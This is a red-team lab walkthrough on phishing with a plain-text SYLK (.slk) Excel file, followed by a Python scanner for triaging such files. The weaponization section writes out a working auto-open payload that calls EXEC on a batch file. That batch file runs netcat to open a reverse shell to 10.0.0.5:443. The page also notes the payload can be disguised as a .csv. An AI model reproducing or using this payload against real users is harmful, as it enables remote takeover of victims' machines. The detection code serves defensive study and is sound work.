Phishing: .SLK Excel
This lab is based on findings by @StanHacked - see the references below for more info.

Weaponization

Create a new text file, paste the code below into it and save it as an .slk file:
demo.slk

ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("c:\shell.cmd")
C;X1;Y102;K0;EHALT()
E

Note that shell.cmd is a simple nc reverse shell batch file:
c:\shell.cmd

C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

Execution

Once the macro warning is dismissed, the reverse shell pops as expected:
Since the file is actually plain text, detecting and triaging malicious intent is easier.
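Because the format is plain text, a few lines of parsing are enough for static triage. The scanner below is an added example, not code from the original lab or the referenced research: it parses SYLK records and flags the three markers present in demo.slk (the O;E option, an Auto_open name and an EXEC formula). The function names and the CALL/REGISTER entries in the formula list are this example's own choices, and it checks content rather than file extension, so the same payload saved as .csv is still flagged.

```python
import re

# Excel 4.0 macro functions that start programs or call native code.
RISKY_FUNCS = re.compile(r"\b(EXEC|CALL|REGISTER)\s*\(", re.I)
AUTO_NAME = re.compile(r"^auto_?(open|close)", re.I)

def split_fields(record):
    """Split a SYLK record on ';' (a literal semicolon is written ';;')."""
    return [p.replace(";;", ";") for p in re.split(r"(?<!;);(?!;)", record)]

def field(args, tag):
    """Return the value of the first field starting with `tag`, or ''."""
    return next((a[len(tag):] for a in args if a.startswith(tag)), "")

def triage_slk(text):
    """Return (line_no, reason, detail) findings for SYLK content."""
    lines = text.splitlines()
    if not lines or not lines[0].startswith("ID;"):
        return []  # SYLK content always begins with an ID record
    findings = []
    for no, line in enumerate(lines, 1):
        rtype, *args = split_fields(line.strip())
        if rtype == "O" and "E" in args:
            # O;E: options record with the macro-sheet flag set
            findings.append((no, "macro-enabled", line.strip()))
        elif rtype == "NN" and AUTO_NAME.match(field(args, "N")):
            # NN: defined name; Auto_open runs its target cell on load
            detail = field(args, "N") + " -> " + field(args, "E")
            findings.append((no, "auto-run name", detail))
        elif rtype == "C" and RISKY_FUNCS.search(field(args, "E")):
            # C: cell record; the E field holds the cell's formula
            findings.append((no, "risky formula", field(args, "E")))
    return findings

# The demo.slk from this page, embedded so the example runs offline.
DEMO_SLK = r'''ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("c:\shell.cmd")
C;X1;Y102;K0;EHALT()
E'''

# Constructed benign sheet: one numeric cell, no names, no macro option.
BENIGN_SLK = "ID;P\nC;X1;Y1;K42\nE"

if __name__ == "__main__":
    for finding in triage_slk(DEMO_SLK):
        print(finding)
```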

Bonus

The payload file could also be saved as a .csv, although Excel then shows an additional warning:

References
